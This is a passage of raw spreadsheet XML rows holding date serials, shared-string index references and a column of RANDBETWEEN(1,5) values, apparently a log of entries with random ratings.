      <c r="E13701" t="s">
        <v>12284</v>
      </c>
      <c r="F13701">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13702" s="1">
        <v>43263.409398148149</v>
      </c>
      <c r="C13702" t="s">
        <v>10</v>
      </c>
      <c r="D13702" t="s">
        <v>80</v>
      </c>
      <c r="E13702" t="s">
        <v>12285</v>
      </c>
      <c r="F13702">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13703" s="1">
        <v>43263.404120370367</v>
      </c>
      <c r="C13703" t="s">
        <v>10</v>
      </c>
      <c r="D13703" t="s">
        <v>36</v>
      </c>
      <c r="E13703" t="s">
        <v>12286</v>
      </c>
      <c r="F13703">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13704" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13704" s="1">
        <v>43263.403252314813</v>
      </c>
      <c r="C13704" t="s">
        <v>10</v>
      </c>
      <c r="D13704" t="s">
        <v>6</v>
      </c>
      <c r="E13704" s="2" t="s">
        <v>12287</v>
      </c>
      <c r="F13704">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13705" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13705" s="1">
        <v>43263.397141203706</v>
      </c>
      <c r="C13705" t="s">
        <v>10</v>
      </c>
      <c r="D13705" t="s">
        <v>36</v>
      </c>
      <c r="E13705" s="2" t="s">
        <v>12288</v>
      </c>
      <c r="F13705">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13706" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13706" s="1">
        <v>43263.377314814818</v>
      </c>
      <c r="C13706" t="s">
        <v>41</v>
      </c>
      <c r="E13706" s="2" t="s">
        <v>12289</v>
      </c>
      <c r="F13706">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13707" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13707" s="1">
        <v>43263.370706018519</v>
      </c>
      <c r="C13707" t="s">
        <v>41</v>
      </c>
      <c r="E13707" s="2" t="s">
        <v>12290</v>
      </c>
      <c r="F13707">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13708" s="1">
        <v>43263.349085648151</v>
      </c>
      <c r="C13708" t="s">
        <v>41</v>
      </c>
      <c r="E13708" t="s">
        <v>12291</v>
      </c>
      <c r="F13708">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13709" s="1">
        <v>43263.341064814813</v>
      </c>
      <c r="C13709" t="s">
        <v>10</v>
      </c>
      <c r="D13709" t="s">
        <v>112</v>
      </c>
      <c r="E13709" t="s">
        <v>12292</v>
      </c>
      <c r="F13709">
        <f t="shared" ca="1" si="214"/>
        <v>4</v>
      </c>
    </row>
    <row r="13710" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13710" s="1">
        <v>43263.242442129631</v>
      </c>
      <c r="C13710" t="s">
        <v>63</v>
      </c>
      <c r="E13710" s="2" t="s">
        <v>12293</v>
      </c>
      <c r="F13710">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13711" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13711" s="1">
        <v>43263.22415509259</v>
      </c>
      <c r="C13711" t="s">
        <v>10</v>
      </c>
      <c r="D13711" t="s">
        <v>232</v>
      </c>
      <c r="E13711" s="2" t="s">
        <v>12294</v>
      </c>
      <c r="F13711">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13712" s="1">
        <v>43263.168738425928</v>
      </c>
      <c r="C13712" t="s">
        <v>253</v>
      </c>
      <c r="E13712" t="s">
        <v>12295</v>
      </c>
      <c r="F13712">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13713" s="1">
        <v>43263.146111111113</v>
      </c>
      <c r="C13713" t="s">
        <v>41</v>
      </c>
      <c r="E13713" t="s">
        <v>12296</v>
      </c>
      <c r="F13713">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13714" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13714" s="1">
        <v>43263.132685185185</v>
      </c>
      <c r="C13714" t="s">
        <v>10</v>
      </c>
      <c r="D13714" t="s">
        <v>36</v>
      </c>
      <c r="E13714" s="2" t="s">
        <v>12297</v>
      </c>
      <c r="F13714">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13715" s="1">
        <v>43263.130856481483</v>
      </c>
      <c r="C13715" t="s">
        <v>48</v>
      </c>
      <c r="E13715" t="s">
        <v>12298</v>
      </c>
      <c r="F13715">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13716" s="1">
        <v>43263.127627314818</v>
      </c>
      <c r="C13716" t="s">
        <v>41</v>
      </c>
      <c r="E13716" t="s">
        <v>12299</v>
      </c>
      <c r="F13716">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13717" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13717" s="1">
        <v>43263.122372685182</v>
      </c>
      <c r="C13717" t="s">
        <v>408</v>
      </c>
      <c r="E13717" s="2" t="s">
        <v>12300</v>
      </c>
      <c r="F13717">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13718" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13718" s="1">
        <v>43263.06454861111</v>
      </c>
      <c r="C13718" t="s">
        <v>41</v>
      </c>
      <c r="E13718" s="2" t="s">
        <v>12301</v>
      </c>
      <c r="F13718">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13719" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13719" s="1">
        <v>43263.064131944448</v>
      </c>
      <c r="C13719" t="s">
        <v>10</v>
      </c>
      <c r="D13719" t="s">
        <v>6</v>
      </c>
      <c r="E13719" s="2" t="s">
        <v>12302</v>
      </c>
      <c r="F13719">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13720" s="1">
        <v>43262.992708333331</v>
      </c>
      <c r="C13720" t="s">
        <v>535</v>
      </c>
      <c r="D13720" t="s">
        <v>36</v>
      </c>
      <c r="E13720" t="s">
        <v>12198</v>
      </c>
      <c r="F13720">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13721" s="1">
        <v>43262.986597222225</v>
      </c>
      <c r="C13721" t="s">
        <v>140</v>
      </c>
      <c r="D13721" t="s">
        <v>312</v>
      </c>
      <c r="E13721" t="s">
        <v>12303</v>
      </c>
      <c r="F13721">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13722" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13722" s="1">
        <v>43262.924201388887</v>
      </c>
      <c r="C13722" t="s">
        <v>43</v>
      </c>
      <c r="D13722" t="s">
        <v>178</v>
      </c>
      <c r="E13722" s="2" t="s">
        <v>12304</v>
      </c>
      <c r="F13722">
        <f t="shared" ca="1" si="214"/>
        <v>4</v>
      </c>
    </row>
    <row r="13723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13723" s="1">
        <v>43262.921203703707</v>
      </c>
      <c r="C13723" t="s">
        <v>10</v>
      </c>
      <c r="D13723" t="s">
        <v>52</v>
      </c>
      <c r="E13723" t="s">
        <v>12305</v>
      </c>
      <c r="F13723">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13724" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A13724" s="1">
        <v>43262.88853009259</v>
      </c>
      <c r="C13724" t="s">
        <v>2210</v>
      </c>
      <c r="D13724" t="s">
        <v>124</v>
      </c>
      <c r="E13724" s="2" t="s">
        <v>12306</v>
      </c>
      <c r="F13724">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13725" s="1">
        <v>43262.842083333337</v>
      </c>
      <c r="C13725" t="s">
        <v>253</v>
      </c>
      <c r="E13725" t="s">
        <v>12307</v>
      </c>
      <c r="F13725">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13726" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13726" s="1">
        <v>43262.837210648147</v>
      </c>
      <c r="C13726" t="s">
        <v>140</v>
      </c>
      <c r="D13726" t="s">
        <v>141</v>
      </c>
      <c r="E13726" s="2" t="s">
        <v>12308</v>
      </c>
      <c r="F13726">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13727" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13727" s="1">
        <v>43262.817754629628</v>
      </c>
      <c r="C13727" t="s">
        <v>454</v>
      </c>
      <c r="D13727" t="s">
        <v>336</v>
      </c>
      <c r="E13727" s="2" t="s">
        <v>12309</v>
      </c>
      <c r="F13727">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13728" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13728" s="1">
        <v>43262.802337962959</v>
      </c>
      <c r="C13728" t="s">
        <v>10</v>
      </c>
      <c r="D13728" t="s">
        <v>33</v>
      </c>
      <c r="E13728" s="2" t="s">
        <v>12310</v>
      </c>
      <c r="F13728">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13729" s="1">
        <v>43262.747256944444</v>
      </c>
      <c r="C13729" t="s">
        <v>535</v>
      </c>
      <c r="D13729" t="s">
        <v>7</v>
      </c>
      <c r="E13729" t="s">
        <v>12198</v>
      </c>
      <c r="F13729">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13730" s="1">
        <v>43262.744664351849</v>
      </c>
      <c r="C13730" t="s">
        <v>10</v>
      </c>
      <c r="D13730" t="s">
        <v>494</v>
      </c>
      <c r="E13730" t="s">
        <v>12311</v>
      </c>
      <c r="F13730">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13731" s="1">
        <v>43262.698831018519</v>
      </c>
      <c r="C13731" t="s">
        <v>10</v>
      </c>
      <c r="D13731" t="s">
        <v>89</v>
      </c>
      <c r="E13731" t="s">
        <v>12312</v>
      </c>
      <c r="F13731">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13732" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13732" s="1">
        <v>43262.693298611113</v>
      </c>
      <c r="C13732" t="s">
        <v>6</v>
      </c>
      <c r="D13732" t="s">
        <v>25</v>
      </c>
      <c r="E13732" s="2" t="s">
        <v>12313</v>
      </c>
      <c r="F13732">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13733" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13733" s="1">
        <v>43262.688449074078</v>
      </c>
      <c r="C13733" t="s">
        <v>6</v>
      </c>
      <c r="D13733" t="s">
        <v>114</v>
      </c>
      <c r="E13733" s="2" t="s">
        <v>12314</v>
      </c>
      <c r="F13733">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13734" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13734" s="1">
        <v>43262.652233796296</v>
      </c>
      <c r="C13734" t="s">
        <v>10</v>
      </c>
      <c r="D13734" t="s">
        <v>112</v>
      </c>
      <c r="E13734" t="s">
        <v>12315</v>
      </c>
      <c r="F13734">
        <f t="shared" ca="1" si="214"/>
        <v>4</v>
      </c>
    </row>
    <row r="13735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13735" s="1">
        <v>43262.624537037038</v>
      </c>
      <c r="C13735" t="s">
        <v>10</v>
      </c>
      <c r="D13735" t="s">
        <v>11</v>
      </c>
      <c r="E13735" t="s">
        <v>12316</v>
      </c>
      <c r="F13735">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13736" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13736" s="1">
        <v>43262.558622685188</v>
      </c>
      <c r="C13736" t="s">
        <v>3049</v>
      </c>
      <c r="E13736" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13736">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13737" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13737" s="1">
        <v>43262.511574074073</v>
      </c>
      <c r="C13737" t="s">
        <v>10</v>
      </c>
      <c r="D13737" t="s">
        <v>6</v>
      </c>
      <c r="E13737" s="2" t="s">
        <v>12317</v>
      </c>
      <c r="F13737">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13738" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13738" s="1">
        <v>43262.505659722221</v>
      </c>
      <c r="C13738" t="s">
        <v>535</v>
      </c>
      <c r="D13738" t="s">
        <v>817</v>
      </c>
      <c r="E13738" s="2" t="s">
        <v>12318</v>
      </c>
      <c r="F13738">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13739" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13739" s="1">
        <v>43262.502881944441</v>
      </c>
      <c r="C13739" t="s">
        <v>10</v>
      </c>
      <c r="D13739" t="s">
        <v>271</v>
      </c>
      <c r="E13739" s="2" t="s">
        <v>12319</v>
      </c>
      <c r="F13739">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13740" s="1">
        <v>43262.498611111114</v>
      </c>
      <c r="C13740" t="s">
        <v>10</v>
      </c>
      <c r="D13740" t="s">
        <v>14</v>
      </c>
      <c r="E13740" t="s">
        <v>12320</v>
      </c>
      <c r="F13740">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13741" s="1">
        <v>43262.481886574074</v>
      </c>
      <c r="C13741" t="s">
        <v>10</v>
      </c>
      <c r="D13741" t="s">
        <v>163</v>
      </c>
      <c r="E13741" t="s">
        <v>12321</v>
      </c>
      <c r="F13741">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13742" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13742" s="1">
        <v>43262.476342592592</v>
      </c>
      <c r="C13742" t="s">
        <v>10</v>
      </c>
      <c r="D13742" t="s">
        <v>17</v>
      </c>
      <c r="E13742" s="2" t="s">
        <v>12322</v>
      </c>
      <c r="F13742">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13743" s="1">
        <v>43262.471284722225</v>
      </c>
      <c r="C13743" t="s">
        <v>10</v>
      </c>
      <c r="D13743" t="s">
        <v>52</v>
      </c>
      <c r="E13743" t="s">
        <v>12323</v>
      </c>
      <c r="F13743">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13744" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13744" s="1">
        <v>43262.460613425923</v>
      </c>
      <c r="C13744" t="s">
        <v>6</v>
      </c>
      <c r="D13744" t="s">
        <v>25</v>
      </c>
      <c r="E13744" s="2" t="s">
        <v>12324</v>
      </c>
      <c r="F13744">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13745" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13745" s="1">
        <v>43262.442939814813</v>
      </c>
      <c r="C13745" t="s">
        <v>10</v>
      </c>
      <c r="D13745" t="s">
        <v>92</v>
      </c>
      <c r="E13745" s="2" t="s">
        <v>12325</v>
      </c>
      <c r="F13745">
        <f t="shared" ca="1" si="214"/>
        <v>4</v>
      </c>
    </row>
    <row r="13746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13746" s="1">
        <v>43262.412951388891</v>
      </c>
      <c r="C13746" t="s">
        <v>10</v>
      </c>
      <c r="D13746" t="s">
        <v>36</v>
      </c>
      <c r="E13746" t="s">
        <v>12326</v>
      </c>
      <c r="F13746">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13747" s="1">
        <v>43262.410555555558</v>
      </c>
      <c r="C13747" t="s">
        <v>107</v>
      </c>
      <c r="D13747" t="s">
        <v>71</v>
      </c>
      <c r="E13747" t="s">
        <v>12327</v>
      </c>
      <c r="F13747">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13748" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13748" s="1">
        <v>43262.401597222219</v>
      </c>
      <c r="C13748" t="s">
        <v>260</v>
      </c>
      <c r="D13748" t="s">
        <v>1036</v>
      </c>
      <c r="E13748" s="2" t="s">
        <v>12328</v>
      </c>
      <c r="F13748">
        <f t="shared" ca="1" si="214"/>
        <v>2</v>
      </c>
    </row>
    <row r="13749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13749" s="1">
        <v>43262.311608796299</v>
      </c>
      <c r="C13749" t="s">
        <v>48</v>
      </c>
      <c r="E13749" t="s">
        <v>12329</v>
      </c>
      <c r="F13749">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13750" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13750" s="1">
        <v>43262.306921296295</v>
      </c>
      <c r="C13750" t="s">
        <v>41</v>
      </c>
      <c r="D13750" t="s">
        <v>312</v>
      </c>
      <c r="E13750" t="s">
        <v>12330</v>
      </c>
      <c r="F13750">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13751" s="1">
        <v>43262.271817129629</v>
      </c>
      <c r="C13751" t="s">
        <v>41</v>
      </c>
      <c r="E13751" t="s">
        <v>12331</v>
      </c>
      <c r="F13751">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13752" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13752" s="1">
        <v>43262.236319444448</v>
      </c>
      <c r="C13752" t="s">
        <v>10</v>
      </c>
      <c r="D13752" t="s">
        <v>107</v>
      </c>
      <c r="E13752" s="2" t="s">
        <v>12332</v>
      </c>
      <c r="F13752">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13753" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13753" s="1">
        <v>43262.197314814817</v>
      </c>
      <c r="C13753" t="s">
        <v>48</v>
      </c>
      <c r="E13753" s="2" t="s">
        <v>12333</v>
      </c>
      <c r="F13753">
        <f t="shared" ca="1" si="214"/>
        <v>4</v>
      </c>
    </row>
    <row r="13754" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13754" s="1">
        <v>43262.151203703703</v>
      </c>
      <c r="C13754" t="s">
        <v>71</v>
      </c>
      <c r="E13754" s="2" t="s">
        <v>12334</v>
      </c>
      <c r="F13754">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13755" s="1">
        <v>43262.129166666666</v>
      </c>
      <c r="C13755" t="s">
        <v>118</v>
      </c>
      <c r="E13755" t="s">
        <v>12335</v>
      </c>
      <c r="F13755">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13756" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13756" s="1">
        <v>43262.029641203706</v>
      </c>
      <c r="C13756" t="s">
        <v>339</v>
      </c>
      <c r="E13756" s="2" t="s">
        <v>12336</v>
      </c>
      <c r="F13756">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13757" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13757" s="1">
        <v>43261.972430555557</v>
      </c>
      <c r="C13757" t="s">
        <v>260</v>
      </c>
      <c r="E13757" s="2" t="s">
        <v>12337</v>
      </c>
      <c r="F13757">
        <f t="shared" ca="1" si="214"/>
        <v>1</v>
      </c>
    </row>
    <row r="13758" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13758" s="1">
        <v>43261.82439814815</v>
      </c>
      <c r="C13758" t="s">
        <v>1077</v>
      </c>
      <c r="D13758" t="s">
        <v>92</v>
      </c>
      <c r="E13758" s="2" t="s">
        <v>12338</v>
      </c>
      <c r="F13758">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13759" s="1">
        <v>43261.798854166664</v>
      </c>
      <c r="C13759" t="s">
        <v>41</v>
      </c>
      <c r="E13759" t="s">
        <v>12339</v>
      </c>
      <c r="F13759">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13760" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13760" s="1">
        <v>43261.756782407407</v>
      </c>
      <c r="C13760" t="s">
        <v>173</v>
      </c>
      <c r="D13760" t="s">
        <v>71</v>
      </c>
      <c r="E13760" s="2" t="s">
        <v>12340</v>
      </c>
      <c r="F13760">
        <f t="shared" ca="1" si="214"/>
        <v>5</v>
      </c>
    </row>
    <row r="13761" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13761" s="1">
        <v>43261.721504629626</v>
      </c>
      <c r="C13761" t="s">
        <v>1408</v>
      </c>
      <c r="D13761" t="s">
        <v>194</v>
      </c>
      <c r="E13761" s="2" t="s">
        <v>12341</v>
      </c>
      <c r="F13761">
        <f t="shared" ca="1" si="214"/>
        <v>3</v>
      </c>
    </row>
    <row r="13762" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13762" s="1">
        <v>43261.660451388889</v>
      </c>
      <c r="C13762" t="s">
        <v>836</v>
      </c>
      <c r="D13762" t="s">
        <v>885</v>
      </c>
      <c r="E13762" s="2" t="s">
        <v>12342</v>
      </c>
      <c r="F13762">
        <f t="shared" ref="F13762:F13825" ca="1" si="215">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="13763" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13763" s="1">
        <v>43261.639560185184</v>
      </c>
      <c r="C13763" t="s">
        <v>73</v>
      </c>
      <c r="D13763" t="s">
        <v>1036</v>
      </c>
      <c r="E13763" s="2" t="s">
        <v>12343</v>
      </c>
      <c r="F13763">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13764" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13764" s="1">
        <v>43261.629837962966</v>
      </c>
      <c r="C13764" t="s">
        <v>1050</v>
      </c>
      <c r="D13764" t="s">
        <v>71</v>
      </c>
      <c r="E13764" s="2" t="s">
        <v>12344</v>
      </c>
      <c r="F13764">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13765" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13765" s="1">
        <v>43261.628611111111</v>
      </c>
      <c r="C13765" t="s">
        <v>7491</v>
      </c>
      <c r="D13765" t="s">
        <v>494</v>
      </c>
      <c r="E13765" s="2" t="s">
        <v>12345</v>
      </c>
      <c r="F13765">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13766" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13766" s="1">
        <v>43261.607951388891</v>
      </c>
      <c r="C13766" t="s">
        <v>454</v>
      </c>
      <c r="D13766" t="s">
        <v>1091</v>
      </c>
      <c r="E13766" s="2" t="s">
        <v>12346</v>
      </c>
      <c r="F13766">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13767" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13767" s="1">
        <v>43261.587997685187</v>
      </c>
      <c r="C13767" t="s">
        <v>3049</v>
      </c>
      <c r="E13767" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13767">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13768" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13768" s="1">
        <v>43261.587361111109</v>
      </c>
      <c r="C13768" t="s">
        <v>222</v>
      </c>
      <c r="D13768" t="s">
        <v>222</v>
      </c>
      <c r="E13768" s="2" t="s">
        <v>12347</v>
      </c>
      <c r="F13768">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13769" s="1">
        <v>43261.294930555552</v>
      </c>
      <c r="C13769" t="s">
        <v>8872</v>
      </c>
      <c r="D13769" t="s">
        <v>667</v>
      </c>
      <c r="E13769" t="s">
        <v>12348</v>
      </c>
      <c r="F13769">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13770" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13770" s="1">
        <v>43261.000949074078</v>
      </c>
      <c r="C13770" t="s">
        <v>41</v>
      </c>
      <c r="E13770" s="2" t="s">
        <v>12349</v>
      </c>
      <c r="F13770">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13771" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13771" s="1">
        <v>43260.937407407408</v>
      </c>
      <c r="C13771" t="s">
        <v>197</v>
      </c>
      <c r="D13771" t="s">
        <v>367</v>
      </c>
      <c r="E13771" s="2" t="s">
        <v>12350</v>
      </c>
      <c r="F13771">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13772" s="1">
        <v>43260.834814814814</v>
      </c>
      <c r="C13772" t="s">
        <v>10</v>
      </c>
      <c r="D13772" t="s">
        <v>86</v>
      </c>
      <c r="E13772" t="s">
        <v>12351</v>
      </c>
      <c r="F13772">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13773" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13773" s="1">
        <v>43260.73847222222</v>
      </c>
      <c r="C13773" t="s">
        <v>6431</v>
      </c>
      <c r="D13773" t="s">
        <v>251</v>
      </c>
      <c r="E13773" s="2" t="s">
        <v>12352</v>
      </c>
      <c r="F13773">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13774" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13774" s="1">
        <v>43260.73847222222</v>
      </c>
      <c r="C13774" t="s">
        <v>2138</v>
      </c>
      <c r="D13774" t="s">
        <v>41</v>
      </c>
      <c r="E13774" s="2" t="s">
        <v>12353</v>
      </c>
      <c r="F13774">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13775" s="1">
        <v>43260.654016203705</v>
      </c>
      <c r="C13775" t="s">
        <v>1130</v>
      </c>
      <c r="D13775" t="s">
        <v>1036</v>
      </c>
      <c r="E13775" t="s">
        <v>12354</v>
      </c>
      <c r="F13775">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13776" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13776" s="1">
        <v>43260.634965277779</v>
      </c>
      <c r="C13776" t="s">
        <v>16</v>
      </c>
      <c r="E13776" s="2" t="s">
        <v>12355</v>
      </c>
      <c r="F13776">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13777" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13777" s="1">
        <v>43260.558506944442</v>
      </c>
      <c r="C13777" t="s">
        <v>48</v>
      </c>
      <c r="E13777" s="2" t="s">
        <v>12356</v>
      </c>
      <c r="F13777">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
